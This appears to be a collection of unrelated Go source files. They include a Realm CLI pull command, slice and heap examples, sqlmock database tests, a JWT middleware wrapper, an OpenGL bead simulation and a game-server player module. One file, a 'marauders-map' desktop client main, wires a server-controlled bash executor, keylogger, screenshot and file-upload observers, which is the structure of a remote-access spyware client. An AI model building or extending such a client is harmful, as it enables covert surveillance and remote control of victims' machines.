				terminal.NewDebugLog("App contents would have been written to: %s", filepath.Join(pathRelative, local.BackendPath)),
				terminal.NewDebugLog("Template contents would have been written to: %s", filepath.Join(pathRelative, local.FrontendPath)),
			)
		} else {
			logs = append(logs, terminal.NewDebugLog("Contents would have been written to: %s", pathRelative))
		}
		ui.Print(logs...)
		return nil
	}
	if err := local.WriteZip(pathBackend, zipPkg); err != nil {
		return fmt.Errorf("unable to write app to disk: %s", err)
	}
	ui.Print(terminal.NewTextLog("Saved app to disk"))
	// Optionally fetch dependencies (package.json or node_modules archive)
	// into the backend's functions directory.
	if cmd.inputs.IncludeNodeModules || cmd.inputs.IncludePackageJSON || cmd.inputs.IncludeDependencies {
		logStr := "as a node_modules archive"
		if cmd.inputs.IncludePackageJSON {
			logStr = "as a package.json file"
		}
		s := ui.Spinner(fmt.Sprintf("Fetching dependencies %s...", logStr), terminal.SpinnerOptions{})
		// Set when package.json was requested but the server returned an
		// archive instead; triggers a warning below.
		var packageJSONMissing bool
		exportDependencies := func() error {
			s.Start()
			defer s.Stop()
			fileName, file, err := cmd.exportDependencies(clients, app)
			if err != nil {
				return err
			}
			if cmd.inputs.IncludePackageJSON && fileName != local.NamePackageJSON {
				packageJSONMissing = true
			}
			return local.WriteFile(
				filepath.Join(pathBackend, local.NameFunctions, fileName),
				0666,
				file,
			)
		}
		if err := exportDependencies(); err != nil {
			return err
		}
		if packageJSONMissing {
			logStr = "as a node_modules archive"
		}
		ui.Print(terminal.NewTextLog("Fetched dependencies " + logStr))
		if packageJSONMissing {
			ui.Print(terminal.NewWarningLog("The package.json file was not found, a node_modules archive was written instead"))
		}
	}
	// Optionally fetch the app's hosting assets.
	if cmd.inputs.IncludeHosting {
		s := ui.Spinner("Fetching hosting assets...", terminal.SpinnerOptions{})
		exportHostingAssets := func() error {
			s.Start()
			defer s.Stop()
			appAssets, err := clients.Realm.HostingAssets(app.GroupID, app.ID)
			if err != nil {
				return err
			}
			return local.WriteHostingAssets(clients.HostingAsset, pathBackend, app.GroupID, app.ID, appAssets)
		}
		if err := exportHostingAssets(); err != nil {
			return err
		}
		ui.Print(terminal.NewDebugLog("Fetched hosting assets"))
	}
	// Write each resolved frontend template under frontend/<template id>.
	successfulTemplateWrites := make([]string, 0, len(clientTemplates))
	for _, ct := range clientTemplates {
		if err := local.WriteZip(filepath.Join(pathFrontend, ct.id), ct.zipPkg); err != nil {
			return fmt.Errorf("unable to save template '%s' to disk: %s", ct.id, err)
		}
		successfulTemplateWrites = append(successfulTemplateWrites, ct.id)
	}
	ui.Print(terminal.NewTextLog("Successfully pulled app down: %s", pathRelative))
	if len(successfulTemplateWrites) != 0 {
		ui.Print(terminal.NewListLog("Successfully saved template(s) to disk", successfulTemplateWrites))
	}
	return nil
}
// doExport downloads the app export zip and resolves the absolute project
// path it should be unpacked into. When no --local path was given, the
// server-provided export name is used with its trailing "_<suffix>" removed.
func (cmd *Command) doExport(profile *user.Profile, realmClient realm.Client, groupID, appID string) (string, *zip.Reader, error) {
	name, zipPkg, err := realmClient.Export(
		groupID,
		appID,
		realm.ExportRequest{ConfigVersion: cmd.inputs.AppVersion},
	)
	if err != nil {
		return "", nil, err
	}

	path := cmd.inputs.LocalPath
	if path == "" {
		// Strip the trailing "_<suffix>" the server appends to export names.
		if idx := strings.LastIndex(name, "_"); idx != -1 {
			name = name[:idx]
		}
		path = name
	}

	// Normalize absolute paths to be relative to the working directory so
	// the final join below yields a consistent target.
	if filepath.IsAbs(path) {
		rel, relErr := filepath.Rel(profile.WorkingDirectory, path)
		if relErr != nil {
			return "", nil, relErr
		}
		path = rel
	}

	return filepath.Join(profile.WorkingDirectory, path), zipPkg, nil
}
// checkPathDestination reports whether it is okay to write into path. It
// auto-approves when the UI is in auto-confirm mode, when the path does not
// exist, or when it exists but is not a directory; an existing directory
// prompts the user for confirmation.
func checkPathDestination(ui terminal.UI, path string) (bool, error) {
	if ui.AutoConfirm() {
		return true, nil
	}
	info, statErr := os.Stat(path)
	switch {
	case os.IsNotExist(statErr):
		return true, nil
	case statErr != nil:
		return false, statErr
	case !info.IsDir():
		return true, nil
	}
	return ui.Confirm("Directory '%s' already exists, do you still wish to proceed?", path)
}
// exportDependencies fetches the app's dependencies from the Realm API as a
// package.json file when --include-package-json was given, and as a
// node_modules archive otherwise. It returns the file name and its contents.
func (cmd *Command) exportDependencies(clients cli.Clients, app realm.App) (string, io.ReadCloser, error) {
	if !cmd.inputs.IncludePackageJSON {
		return clients.Realm.ExportDependenciesArchive(app.GroupID, app.ID)
	}
	return clients.Realm.ExportDependencies(app.GroupID, app.ID)
}
|
package main
import "fmt"
// make()函数创造切片(可以指定长度和容量)
// make([]T,len,cap)
// main demonstrates slice creation with make, slice assignment (shared
// backing array), and the two common iteration styles.
func main() {
	// make([]T, len, cap); cap defaults to len when omitted.
	a := make([]int, 5)
	b := make([]int, 5, 10)
	fmt.Printf("s1=%v len(s1)=%d cap(s1)=%d\n", a, len(a), cap(a))
	fmt.Printf("s2=%v len(s2)=%d cap(s2)=%d\n", b, len(b), cap(b))

	// To check whether a slice is empty, test len == 0 (not == nil).
	// Assignment copies the slice header only — both slices share one
	// backing array.
	x := []int{1, 3, 5}
	y := x
	fmt.Println(x, y)
	x[0] = 1000 // visible through y as well, since the array is shared
	fmt.Println(x, y)

	// Index-based iteration.
	for i := 0; i < len(x); i++ {
		fmt.Println(x[i])
	}
	// Range-based iteration.
	for i, v := range x {
		fmt.Println(i, v)
	}
}
|
package heap_util
import (
"container/heap"
"fmt"
)
// This example inserts several ints into an IntHeap, checks the minimum,
// and removes them in order of priority.
func Example_intHeap() {
	h := &IntHeap{2, 1, 5}
	heap.Init(h)
	heap.Push(h, 3)
	// After Init/Push, index 0 always holds the heap minimum.
	fmt.Printf("minimum: %d\n", (*h)[0])
	for h.Len() > 0 {
		fmt.Printf("%d ", heap.Pop(h))
	}
	// Output:
	// minimum: 1
	// 1 2 3 5
}
// This example inserts several ints into an Int64Heap, checks the minimum,
// and removes them in order of priority.
func Example_int64Heap() {
	h := &Int64Heap{2, 1, 5}
	heap.Init(h)
	// Push takes interface{}, so the value must already be an int64.
	heap.Push(h, int64(3))
	fmt.Printf("minimum: %d\n", (*h)[0])
	for h.Len() > 0 {
		fmt.Printf("%d ", heap.Pop(h))
	}
	// Output:
	// minimum: 1
	// 1 2 3 5
}
// This example inserts several strings into a StringHeap, checks the
// minimum, and removes them in lexicographic order. (Also fixes the
// non-gofmt call `heap.Push(h,"cab")` and adds the doc comment the sibling
// examples already have.)
func Example_stringHeap() {
	h := &StringHeap{"abc", "bca", "cba"}
	heap.Init(h)
	heap.Push(h, "cab")
	fmt.Printf("minimum: %s\n", (*h)[0])
	for h.Len() > 0 {
		fmt.Printf("%s ", heap.Pop(h))
	}
	// Output:
	// minimum: abc
	// abc bca cab cba
}
|
package repository
import (
. "2019_2_IBAT/pkg/pkg/models"
"fmt"
"reflect"
"testing"
"github.com/google/uuid"
"github.com/jmoiron/sqlx"
"github.com/pkg/errors"
sqlmock "gopkg.in/DATA-DOG/go-sqlmock.v1"
)
// TestDBUserStorage_GetSeekers_Correct checks that GetSeekers returns every
// seeker row together with the per-seeker resume IDs.
func TestDBUserStorage_GetSeekers_Correct(t *testing.T) {
	db, mock, err := sqlmock.New()
	// Check the error BEFORE deferring Close: on failure db is nil and the
	// deferred Close would panic.
	if err != nil {
		t.Fatalf("cant create mock: %s", err)
	}
	defer db.Close()
	sqlxDB := sqlx.NewDb(db, "sqlmock")
	rows := sqlmock.
		NewRows([]string{"id", "email", "first_name", "second_name", "path_to_image"})
	rows_resumes_id1 := sqlmock.NewRows([]string{"id"})
	rows_resumes_id2 := sqlmock.NewRows([]string{"id"})
	expect := []Seeker{
		{
			ID:         uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642ad8a"),
			Email:      "some@mail.ru",
			FirstName:  "Victor",
			SecondName: "Timofeev",
			PathToImg:  "",
			Resumes:    []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
		},
		{
			ID:         uuid.MustParse("f14c6111-3430-413b-ab4e-e31c8642ad8a"),
			Email:      "some@mail.ru",
			FirstName:  "Victor",
			SecondName: "Timofeev",
			PathToImg:  "",
			Resumes:    []uuid.UUID{uuid.MustParse("11b77a73-bac7-4597-ab71-7b5fbe53052d")},
		},
	}
	for _, item := range expect {
		rows = rows.AddRow(item.ID.String(), item.Email, item.FirstName, item.SecondName,
			item.PathToImg,
		)
	}
	mock.
		ExpectQuery("SELECT id, email, first_name, second_name," +
			"path_to_image FROM persons WHERE").
		WithArgs(SeekerStr).
		WillReturnRows(rows)
	rows_resumes_id1 = rows_resumes_id1.AddRow(uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d").String())
	mock.
		ExpectQuery("SELECT r.id FROM resumes AS r WHERE").
		WithArgs(expect[0].ID).
		WillReturnRows(rows_resumes_id1)
	rows_resumes_id2 = rows_resumes_id2.AddRow(uuid.MustParse("11b77a73-bac7-4597-ab71-7b5fbe53052d").String())
	mock.
		ExpectQuery("SELECT r.id FROM resumes AS r WHERE").
		WithArgs(expect[1].ID).
		WillReturnRows(rows_resumes_id2)
	repo := DBUserStorage{
		DbConn: sqlxDB,
	}
	seekers, err := repo.GetSeekers()
	if err != nil {
		t.Errorf("unexpected err: %s", err)
		return
	}
	if err := mock.ExpectationsWereMet(); err != nil {
		t.Errorf("there were unfulfilled expectations: %s", err)
		return
	}
	if !reflect.DeepEqual(seekers, expect) {
		t.Errorf("results not match,\n want\n%v,\n have\n %v\n", expect, seekers)
		return
	}
}
// TestDBUserStorage_GetSeekers_Fail checks that GetSeekers surfaces a query
// error from the persons select.
func TestDBUserStorage_GetSeekers_Fail(t *testing.T) { //ADD SECOND SELECT TEST CASE
	db, mock, err := sqlmock.New()
	// Check the error BEFORE deferring Close: on failure db is nil and the
	// deferred Close would panic.
	if err != nil {
		t.Fatalf("cant create mock: %s", err)
	}
	defer db.Close()
	sqlxDB := sqlx.NewDb(db, "sqlmock")
	mock.
		ExpectQuery("SELECT id, email, first_name, second_name," +
			"path_to_image FROM persons WHERE").
		WithArgs().
		WillReturnError(errors.New("GetSeeker: error while query seekers"))
	repo := DBUserStorage{
		DbConn: sqlxDB,
	}
	seekers, err := repo.GetSeekers()
	fmt.Println(seekers)
	if err == nil {
		fmt.Println(err)
		t.Errorf("Expected err")
		return
	}
	if err := mock.ExpectationsWereMet(); err != nil {
		t.Errorf("there were unfulfilled expectations: %s", err)
		return
	}
}
// TestDBUserStorage_GetSeeker_Correct checks that GetSeeker returns one
// seeker with its resume IDs.
func TestDBUserStorage_GetSeeker_Correct(t *testing.T) {
	db, mock, err := sqlmock.New()
	// Check the error BEFORE deferring Close: on failure db is nil and the
	// deferred Close would panic.
	if err != nil {
		t.Fatalf("cant create mock: %s", err)
	}
	defer db.Close()
	sqlxDB := sqlx.NewDb(db, "sqlmock")
	defer sqlxDB.Close()
	rows := sqlmock.
		NewRows([]string{"id", "email", "first_name", "second_name", "path_to_image"})
	rows_resumes_id1 := sqlmock.NewRows([]string{"id"})
	expect := Seeker{
		ID:         uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642ad8a"),
		Email:      "some@mail.ru",
		FirstName:  "Victor",
		SecondName: "Timofeev",
		PathToImg:  "",
		Resumes:    []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
	}
	rows = rows.AddRow(expect.ID.String(), expect.Email, expect.FirstName,
		expect.SecondName, expect.PathToImg,
	)
	mock.
		ExpectQuery("SELECT id, email, first_name, second_name, " +
			"path_to_image FROM persons WHERE").
		WithArgs(expect.ID).
		WillReturnRows(rows)
	rows_resumes_id1 = rows_resumes_id1.AddRow(uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d").String())
	mock.
		ExpectQuery("SELECT r.id FROM resumes AS r WHERE").
		WithArgs(expect.ID).
		WillReturnRows(rows_resumes_id1)
	repo := DBUserStorage{
		DbConn: sqlxDB,
	}
	item, err := repo.GetSeeker(expect.ID)
	if err != nil {
		t.Errorf("unexpected err: %s", err)
		return
	}
	if err := mock.ExpectationsWereMet(); err != nil {
		t.Errorf("there were unfulfilled expectations: %s", err)
		return
	}
	if !reflect.DeepEqual(item, expect) {
		t.Errorf("results not match,\n want\n%v,\n have\n %v\n", expect, item)
		return
	}
}
// TestDBUserStorage_GetSeeker_Fail checks that GetSeeker surfaces an error
// when the persons select fails.
func TestDBUserStorage_GetSeeker_Fail(t *testing.T) {
	db, mock, err := sqlmock.New()
	// Check the error BEFORE deferring Close: on failure db is nil and the
	// deferred Close would panic.
	if err != nil {
		t.Fatalf("cant create mock: %s", err)
	}
	defer db.Close()
	sqlxDB := sqlx.NewDb(db, "sqlmock")
	defer sqlxDB.Close()
	id := uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba")
	mock.
		ExpectQuery("SELECT id, email, first_name, second_name, " +
			"path_to_image FROM persons WHERE ").
		WithArgs(id).
		WillReturnError(errors.New("sql: no rows in result set"))
	repo := DBUserStorage{
		DbConn: sqlxDB,
	}
	seeker, err := repo.GetSeeker(id)
	fmt.Println(seeker)
	if err == nil {
		fmt.Println(err)
		t.Errorf("Expected err")
		return
	}
	if err := mock.ExpectationsWereMet(); err != nil {
		t.Errorf("there were unfulfilled expectations: %s", err)
		return
	}
}
// TestDBUserStorage_GetSeeker_Fail2 checks that GetSeeker surfaces an error
// when the persons select succeeds but the resumes select fails.
func TestDBUserStorage_GetSeeker_Fail2(t *testing.T) {
	db, mock, err := sqlmock.New()
	// Check the error BEFORE deferring Close: on failure db is nil and the
	// deferred Close would panic.
	if err != nil {
		t.Fatalf("cant create mock: %s", err)
	}
	defer db.Close()
	sqlxDB := sqlx.NewDb(db, "sqlmock")
	defer sqlxDB.Close()
	rows := sqlmock.
		NewRows([]string{"id", "email", "first_name", "second_name", "path_to_image"})
	expect := Seeker{
		ID:         uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba"),
		Email:      "some@mail.ru",
		FirstName:  "Victor",
		SecondName: "Timofeev",
		PathToImg:  "",
		Resumes:    []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
	}
	rows = rows.AddRow(expect.ID.String(), expect.Email, expect.FirstName,
		expect.SecondName, expect.PathToImg,
	)
	id := uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba")
	mock.
		ExpectQuery("SELECT id, email, first_name, second_name, " +
			"path_to_image FROM persons WHERE ").
		WithArgs(id).
		WillReturnRows(rows)
	mock.
		ExpectQuery("SELECT r.id FROM resumes AS r WHERE").
		WithArgs(id).
		WillReturnError(errors.New("GetSeeker: Invalid id"))
	repo := DBUserStorage{
		DbConn: sqlxDB,
	}
	seeker, err := repo.GetSeeker(id)
	fmt.Println(seeker)
	if err == nil {
		fmt.Println(err)
		t.Errorf("Expected err")
		return
	}
	if err := mock.ExpectationsWereMet(); err != nil {
		t.Errorf("there were unfulfilled expectations: %s", err)
		return
	}
}
// TestDBUserStorage_CreateSeeker_Correct checks that CreateSeeker reports
// success when the insert succeeds. Also verifies the mock expectations,
// matching the sibling tests (this check was previously missing here).
func TestDBUserStorage_CreateSeeker_Correct(t *testing.T) {
	db, mock, err := sqlmock.New()
	// Check the error BEFORE deferring Close: on failure db is nil and the
	// deferred Close would panic.
	if err != nil {
		t.Fatalf("cant create mock: %s", err)
	}
	defer db.Close()
	sqlxDB := sqlx.NewDb(db, "sqlmock")
	defer sqlxDB.Close()
	seeker := Seeker{
		ID:         uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba"),
		Email:      "some@mail.ru",
		FirstName:  "Victor",
		SecondName: "Timofeev",
		PathToImg:  "",
		Resumes:    []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
	}
	mock.
		ExpectExec(`INSERT INTO persons`).
		WithArgs(
			seeker.ID, seeker.Email, seeker.FirstName,
			seeker.SecondName, seeker.Password, SeekerStr, seeker.PathToImg,
		).
		WillReturnResult(sqlmock.NewResult(1, 1))
	repo := DBUserStorage{
		DbConn: sqlxDB,
	}
	ok := repo.CreateSeeker(seeker)
	if !ok {
		t.Error("Failed to create vacancy\n")
		return
	}
	if err := mock.ExpectationsWereMet(); err != nil {
		t.Errorf("there were unfulfilled expectations: %s", err)
	}
}
// TestDBUserStorage_CreateSeeker_False checks that CreateSeeker reports
// failure when the insert errors.
func TestDBUserStorage_CreateSeeker_False(t *testing.T) {
	db, mock, err := sqlmock.New()
	// Check the error BEFORE deferring Close: on failure db is nil and the
	// deferred Close would panic.
	if err != nil {
		t.Fatalf("cant create mock: %s", err)
	}
	defer db.Close()
	sqlxDB := sqlx.NewDb(db, "sqlmock")
	defer sqlxDB.Close()
	seeker := Seeker{
		ID:         uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba"),
		Email:      "some@mail.ru",
		FirstName:  "Victor",
		SecondName: "Timofeev",
		PathToImg:  "",
		Resumes:    []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
	}
	mock.
		ExpectExec(`INSERT INTO persons`).
		WithArgs(
			seeker.ID, seeker.Email, seeker.FirstName,
			seeker.SecondName, seeker.Password, SeekerStr, seeker.PathToImg,
		).
		WillReturnError(fmt.Errorf("bad query"))
	repo := DBUserStorage{
		DbConn: sqlxDB,
	}
	ok := repo.CreateSeeker(seeker)
	if ok {
		t.Errorf("expected false, got true")
		return
	}
	if err := mock.ExpectationsWereMet(); err != nil {
		t.Errorf("there were unfulfilled expectations: %s", err)
	}
}
// TestDBUserStorage_PutSeeker_Correct checks that PutSeeker reports success
// when the update succeeds.
func TestDBUserStorage_PutSeeker_Correct(t *testing.T) {
	db, mock, err := sqlmock.New()
	// Check the error BEFORE deferring Close: on failure db is nil and the
	// deferred Close would panic.
	if err != nil {
		t.Fatalf("cant create mock: %s", err)
	}
	defer db.Close()
	sqlxDB := sqlx.NewDb(db, "sqlmock")
	defer sqlxDB.Close()
	seeker := SeekerReg{
		Email:      "some@mail.ru",
		FirstName:  "Victor",
		SecondName: "Timofeev",
		Password:   "sdfsdf",
	}
	id := uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba")
	mock.
		ExpectExec(`UPDATE persons SET`).
		WithArgs(
			seeker.Email, seeker.FirstName,
			seeker.SecondName, seeker.Password, id,
		).
		WillReturnResult(sqlmock.NewResult(1, 1))
	repo := DBUserStorage{
		DbConn: sqlxDB,
	}
	ok := repo.PutSeeker(seeker, id)
	if !ok {
		t.Error("Failed to put seeker\n")
		return
	}
	if err := mock.ExpectationsWereMet(); err != nil {
		t.Errorf("there were unfulfilled expectations: %s", err)
	}
}
// TestDBUserStorage_PutSeeker_False checks that PutSeeker reports failure
// when the update errors.
func TestDBUserStorage_PutSeeker_False(t *testing.T) {
	db, mock, err := sqlmock.New()
	// Check the error BEFORE deferring Close: on failure db is nil and the
	// deferred Close would panic.
	if err != nil {
		t.Fatalf("cant create mock: %s", err)
	}
	defer db.Close()
	sqlxDB := sqlx.NewDb(db, "sqlmock")
	defer sqlxDB.Close()
	seeker := SeekerReg{
		Email:      "some@mail.ru",
		FirstName:  "Victor",
		SecondName: "Timofeev",
		Password:   "sdfsdf",
	}
	id := uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba")
	mock.
		ExpectExec(`UPDATE persons SET`).
		WithArgs(
			seeker.Email, seeker.FirstName,
			seeker.SecondName, seeker.Password, id,
		).
		WillReturnError(fmt.Errorf("bad query"))
	repo := DBUserStorage{
		DbConn: sqlxDB,
	}
	ok := repo.PutSeeker(seeker, id)
	if ok {
		t.Errorf("expected false, got true")
		return
	}
	if err := mock.ExpectationsWereMet(); err != nil {
		t.Errorf("there were unfulfilled expectations: %s", err)
	}
}
|
/*
* Go Library (C) 2017 Inc.
*
* @project Project Globo / avaliacao.com
* @author @jeffotoni
* @size 01/03/2018
*/
package handler
import (
"github.com/jeffotoni/gmongocrud/lib/context"
//"net/http"
)
// fa is an authentication predicate: it reports whether the request held in
// ctx is authorized.
type fa func(ctx *context.Context) bool

// fn2 is a context-based request handler.
type fn2 func(ctx *context.Context)
// HandlerFuncAuth wraps handlerContext with the authJwt check: the returned
// handler runs handlerContext when authentication succeeds and HandlerError
// otherwise.
func HandlerFuncAuth(authJwt fa, handlerContext fn2) fn2 {
	return func(ctx *context.Context) {
		if !authJwt(ctx) {
			HandlerError(ctx)
			return
		}
		handlerContext(ctx)
	}
}
|
package controller
import (
"../basic"
"github.com/go-gl/gl/v4.1-core/gl"
"math"
"math/rand"
"github.com/lucasb-eyer/go-colorful"
)
// Controllable is the per-frame update/draw contract for anything driven by
// the main loop.
type Controllable interface {
	Update()
	Draw()
}
// damping scales the impulse exchanged in collisions, bleeding off a little
// energy on each bounce (1.0 would preserve the impulse exactly).
var damping = float32(0.99)
// controller owns the simulation's beads and drives their physics and
// rendering. The embedded Controllable is never assigned in this file —
// presumably it exists only so *controller satisfies the interface; verify
// against callers.
type controller struct {
	beads    []*bead // all simulated beads
	beadsNum int     // kept in sync with len(beads) by NewController/AddBead
	Controllable
}
// NewController creates a controller pre-populated with 20 beads at random
// positions with random radii.
func NewController() *controller {
	const initialBeads = 20
	beads := make([]*bead, initialBeads)
	for i := range beads {
		pos := &basic.Point{X: rand.Float32()*2.0 - 1.0, Y: rand.Float32()}
		beads[i] = NewBead(pos, rand.Float32()*0.1+0.05, &colorful.Color{R: 0.7, G: 0.2})
	}
	return &controller{beads: beads, beadsNum: initialBeads}
}
// AddBead appends one new bead of random radius at (x, y), keeping the bead
// counter in sync with the slice.
func (c *controller) AddBead(x, y float32) {
	b := NewBead(&basic.Point{X: x, Y: y}, rand.Float32()*0.1+0.05, &colorful.Color{R: 0.7, G: 0.2})
	c.beads = append(c.beads, b)
	c.beadsNum++
}
// Update advances the simulation one step: apply gravity, resolve
// bead/bead and bead/border overlaps positionally, integrate, then resolve
// collisions again with impulse preservation.
func (c *controller) Update() {
	// apply runs f over every bead, preserving the original pass order.
	apply := func(f func(b *bead)) {
		for i := 0; i < c.beadsNum; i++ {
			f(c.beads[i])
		}
	}
	apply(func(b *bead) { b.accelerate(0.01) })
	c.collide(false)
	apply(func(b *bead) { b.borderCollide(false) })
	apply(func(b *bead) { b.inertia() })
	c.collide(true)
	apply(func(b *bead) { b.borderCollide(true) })
}
// collide resolves every overlapping bead pair by pushing the two beads
// apart along their separation axis; when preserveImpulse is set it also
// exchanges the (damped) normal components of their velocities via the
// prev positions. The separation vector's length and normal are computed
// once per pair — the previous version recomputed Length() up to five times
// and Normalized() up to four times per colliding pair.
func (c *controller) collide(preserveImpulse bool) {
	for i := 0; i < c.beadsNum; i++ {
		for j := i + 1; j < c.beadsNum; j++ {
			b1 := c.beads[i]
			b2 := c.beads[j]
			dir := b2.current.Sub(b1.current)
			dist := dir.Length()
			if dist >= b1.radius+b2.radius {
				continue
			}
			n := dir.Normalized()
			d := b1.radius + b2.radius - dist // overlap depth
			v1 := b1.velocity()
			v2 := b2.velocity()
			// Push each bead half the overlap away from the other.
			b1.current = b1.current.Add(n.Mult(-d / 2.0))
			b2.current = b2.current.Add(n.Mult(d / 2.0))
			if preserveImpulse {
				// Swap the damped normal velocity components by adjusting
				// the previous positions (Verlet-style integration).
				b1Impulse := n.Mult(n.Product(v1)).Mult(damping)
				b2Impulse := n.Mult(n.Product(v2)).Mult(damping)
				b1.prev = b1.current.Sub(v1.Add(b2Impulse).Sub(b1Impulse))
				b2.prev = b2.current.Sub(v2.Add(b1Impulse).Sub(b2Impulse))
			}
		}
	}
}
// Draw renders every bead as a fan of VertexCount triangles. Each vertex
// carries 7 floats (3 position + 4 RGBA), and each triangle is
// (center, rim point at theta, rim point at theta2).
func (c *controller) Draw() {
	// 7 floats per vertex, 3 vertices per triangle, VertexCount triangles per bead.
	array := make([]float32, (VertexCount*3)*7*c.beadsNum)
	for j, b := range c.beads {
		// 21 = 3 vertices * 7 floats; one bead occupies 21*VertexCount floats.
		offset := 21*VertexCount*j
		for i := 0; i < VertexCount; i++ {
			theta := math.Pi * 2.0 * float64(i) / VertexCount
			// Triangle vertex 0: bead center.
			array[offset+(i*3)*7+0], array[offset+(i*3)*7+1], array[offset+(i*3)*7+2] = b.current.Elements()
			array[offset+(i*3)*7+3], array[offset+(i*3)*7+4], array[offset+(i*3)*7+5], array[offset+(i*3)*7+6] = b.colorRGBA()
			// Triangle vertex 1: rim point at angle theta.
			array[offset+(i*3+1)*7+0], array[offset+(i*3+1)*7+1], array[offset+(i*3+1)*7+2] = b.current.Add(
				&basic.Point{
					X: b.radius*float32(math.Cos(theta)),
					Y: b.radius*float32(math.Sin(theta)),
				}).Elements()
			array[offset+(i*3+1)*7+3], array[offset+(i*3+1)*7+4], array[offset+(i*3+1)*7+5], array[offset+(i*3+1)*7+6] = b.colorRGBA()
			// Triangle vertex 2: rim point at the next angle.
			theta2 := math.Pi * 2.0 * float64(i+1) / VertexCount
			array[offset+(i*3+2)*7+0], array[offset+(i*3+2)*7+1], array[offset+(i*3+2)*7+2] = b.current.Add(
				&basic.Point{
					X: b.radius*float32(math.Cos(theta2)),
					Y: b.radius*float32(math.Sin(theta2)),
				}).Elements()
			array[offset+(i*3+2)*7+3], array[offset+(i*3+2)*7+4], array[offset+(i*3+2)*7+5], array[offset+(i*3+2)*7+6] = b.colorRGBA()
		}
	}
	// Upload all vertices once, then issue one draw call per bead.
	VAO := makeVao(array)
	gl.BindVertexArray(VAO)
	for j := range c.beads {
		gl.DrawArrays(gl.TRIANGLES, int32(3*7*VertexCount*j), 3*7*VertexCount)
	}
}
// makeVao uploads the interleaved vertex data (3 position floats + 4 color
// floats per vertex) into a fresh VBO and returns a VAO configured with
// attribute 0 = position and attribute 1 = color.
// NOTE(review): a new VBO/VAO is created on every call with no deletion —
// presumably acceptable for this demo, but it leaks GL objects if called
// per frame; confirm against the caller.
func makeVao(array []float32) uint32 {
	var vbo uint32
	gl.GenBuffers(1, &vbo)
	gl.BindBuffer(gl.ARRAY_BUFFER, vbo)
	// 4 bytes per float32.
	gl.BufferData(gl.ARRAY_BUFFER, 4*len(array), gl.Ptr(array), gl.STATIC_DRAW)
	var vao uint32
	gl.GenVertexArrays(1, &vao)
	gl.BindVertexArray(vao)
	gl.EnableVertexAttribArray(0)
	gl.EnableVertexAttribArray(1)
	gl.BindBuffer(gl.ARRAY_BUFFER, vbo)
	// Stride is 7 floats (28 bytes); color starts after the 3 position floats.
	gl.VertexAttribPointer(0, 3, gl.FLOAT, false, 7*4, gl.PtrOffset(0))
	gl.VertexAttribPointer(1, 4, gl.FLOAT, false, 7*4, gl.PtrOffset(3*4))
	return vao
}
|
package main
import (
"marauders-map-client-desktop/internal"
)
// main wires up the desktop client: local persistence, websocket and HTTP
// endpoint configuration, the command observers, and finally the blocking
// server communication loop.
func main() {
	// Set up the program's home-directory folder structure and persistence.
	tower := internal.Deploy()

	// Endpoint configuration for the websocket control channel and the
	// HTTP file-upload endpoint, then the client built from both.
	wsConf := internal.NewWSConfiguration("ws", "localhost", "8080", "/accesspoint")
	httpConf := internal.NewHTTPConfiguration("http", "localhost", "8080", "/file/upload")
	client := internal.NewWSClient(wsConf, httpConf)

	// Observers that process commands arriving from the server.
	recorder := internal.NewScreenRecorder(5)
	sendFile := internal.NewSendFileCommand(client)
	respond := internal.NewRespondServerCommand(client)
	subject := &internal.Subject{}
	subject.AddListener(internal.NewBashExecutorObserver(respond))
	subject.AddListener(internal.NewKeyloggerCmdObserver())
	subject.AddListener(internal.NewScreenshotCmdObserver(recorder, sendFile, respond))
	subject.AddListener(internal.NewFileCmdObserver(sendFile, tower, respond))

	// Start talking to the server, dispatching commands via the subject.
	client.StartCommunications(subject)
}
|
package player
import (
"api"
"fmt"
"github.com/kataras/iris/core/errors"
pb "gos_rpc_proto"
"gosconf"
"goslib/broadcast"
"goslib/gen_server"
"goslib/logger"
"goslib/memstore"
"goslib/packet"
"goslib/session_utils"
"gslib"
"gslib/routes"
"gslib/scene_mgr"
"runtime"
"time"
)
// Player is an actor-style process (managed by gen_server) that owns the
// state of a single connected player; all mutations go through the
// HandleCast/HandleCall callbacks.
type Player struct {
	PlayerId     string                                // account id; also used as the gen_server registration name
	Store        *memstore.MemStore                    // in-memory store, persisted periodically and at shutdown
	Session      *session_utils.Session                // looked up in Init; may remain nil if the lookup fails
	stream       pb.RouteConnectGame_AgentStreamServer // gRPC stream to the client; nil while disconnected
	processed    int                                   // count of handled requests, for logging
	activeTimer  *time.Timer                           // drives the idle-expiry check
	persistTimer *time.Timer                           // drives the periodic persist cast
	lastActive   int64                                 // unix seconds of the last client activity
}

// RPCReply carries a handler's response together with the API method
// name used to encode it for the wire.
type RPCReply struct {
	EncodeMethod string
	Response     interface{}
}

// EXPIRE_DURATION is the idle timeout in seconds after which a player
// process is stopped (see startActiveCheck).
const EXPIRE_DURATION = 1800

// BroadcastHandler, when installed by the application, receives channel
// broadcast messages delivered to a player.
var BroadcastHandler func(*Player, *broadcast.BroadcastMsg) = nil

// CurrentGameAppId identifies the game app instance this process runs as.
var CurrentGameAppId string
// PlayerConnected attaches the given gRPC stream to the player's
// process, starting the process first if needed.
func PlayerConnected(accountId string, stream pb.RouteConnectGame_AgentStreamServer) {
	CastPlayer(accountId, "connected", stream)
}

// PlayerDisconnected clears the player's stream so later sends fail fast
// instead of writing to a dead connection.
func PlayerDisconnected(accountId string) {
	CastPlayer(accountId, "disconnected")
}

// HandleRequest asynchronously dispatches a raw client request frame to
// the player's process.
func HandleRequest(accountId string, requestData []byte) {
	CastPlayer(accountId, "handleRequest", requestData)
}
